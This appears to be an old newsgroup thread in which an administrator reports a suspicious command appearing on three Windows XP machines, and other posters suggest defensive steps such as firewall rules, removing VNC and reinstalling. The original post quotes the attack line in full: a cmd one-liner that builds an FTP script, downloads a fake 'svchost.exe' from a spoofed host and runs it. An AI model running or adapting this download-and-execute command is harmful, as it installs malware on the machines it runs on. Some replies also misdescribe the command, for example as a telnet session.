Virus Activity?

[Guest]

We had three users (all with XP SP2) that all of a sudden this morning had
their task manager open up along with a command prompt. In the command
prompt, a statement was input along the lines of the following....

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
&echo get svchost.exe >> o &echo quit >> o &ftp -n -s &del /F /Q o
&svchost.exe


Anyone seen anything like this before? We haven't approved any Windows
Updates or anything like that (even though I wouldn't think that would have
anything to do with this). That is not a typo (above in the statement where
it says mircosoft password). Any help would be appreciated. We saw three at
the exact same time and then haven't seen anymore (we have about 100 Windows
XP SP2 machines).

Thanks in advance,
ctowndu33

 

[Lanwench [MVP - Exchange]]

We had three users (all with XP SP2) that all of a sudden this
morning had their task manager open up along with a command prompt.
In the command prompt, a statement was input along the lines of the
following....

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
/Q o &svchost.exe


Anyone seen anything like this before? We haven't approved any
Windows Updates or anything like that (even though I wouldn't think
that would have anything to do with this). That is not a typo (above
in the statement where it says mircosoft password). Any help would
be appreciated. We saw three at the exact same time and then haven't
seen anymore (we have about 100 Windows XP SP2 machines).

Thanks in advance,
ctowndu33

What antivirus software do you use? What firewall protects your network? Is
the Windows firewall enabled on these machines? I would disconnect them from
the network immediately while you do some checking, although if your other
machines aren't sufficiently protected you may have other creepy crawlies on
the network.

 

[Mike Lowery]

Looks suspicious. There are viruses that infect svchost.exe. Not sure what to
make of the commands though. "open" is not a Windows application or command and
"ms.microsoft.com" is registered to Microsoft. Of course they could have that
go anywhere if your hosts file was hacked.

 

[Guest]

We for the most part are uptodate on Windows Updates. We are also uptodate
on our Symantec CE for the desktops (not my personal choice but everyone has
current definitions). We have a PIX in place, but our Windows Firewalls are
turned off. Since my post, I was told from one of our users that their
cursor moved. Now, the guy here before me deployed VNC through his image to
all the PCs. Since then, I have created a new image without VNC and in the
last 6 months, we have replaced about 1/2 of the computers. This was a great
excuse to go out and remove the rest of the installs. I can't imagine though
anyone that previously worked here connecting and trying to execute that
command.

 

[Lenny]

fdisk and format and reinstall

 

[Lanwench [MVP - Exchange]]

We for the most part are uptodate on Windows Updates. We are also
uptodate on our Symantec CE for the desktops (not my personal choice
but everyone has current definitions).

Have you forced a full scan?
What about anti-malware/adware/spyware?

We have a PIX in place, but
our Windows Firewalls are turned off.

I'd change that (use group policy to manage it, as I expect you have AD).
You can set up exceptions as needed. Also, on your PIX, I'd deny all
outbound Internet access from the LAN IP range used by your workstations
except TCP 80 and 443, for starters - and remove your end users from the
local administrators groups.

Since my post, I was told from
one of our users that their cursor moved. Now, the guy here before
me deployed VNC through his image to all the PCs. Since then, I have
created a new image without VNC and in the last 6 months, we have
replaced about 1/2 of the computers. This was a great excuse to go
out and remove the rest of the installs. I can't imagine though
anyone that previously worked here connecting and trying to execute
that command.

Is VNC traffic even allowed inbound through your Pix? Close it, if so. What
exactly is open?

What you saw looks highly suspicious to me. Someone or something is trying
to run a telnet session for some reason. I can't find anything useful in
google, but you might post in microsoft.public.security for more expert
help.

 

[Lanwench [MVP - Exchange]]

fdisk and format and reinstall

That's pretty extreme!